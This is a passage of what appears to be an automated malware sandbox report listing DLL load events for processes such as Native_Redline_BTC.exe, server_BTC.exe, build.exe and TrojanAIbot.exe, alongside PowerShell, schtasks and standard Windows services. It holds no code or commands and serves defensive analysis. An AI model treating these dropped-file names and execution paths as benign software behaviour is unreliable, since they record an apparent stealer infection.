Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\alg.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\alg.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\alg.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\alg.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\alg.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\alg.exe	Section loaded: webio.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appvpolicy.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appmanagementconfiguration.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtctm.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcprx.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtclog.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxclu.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: xolehlp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxclu.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: comres.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcvsp1res.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxoci.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: oci.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: cscapi.dll
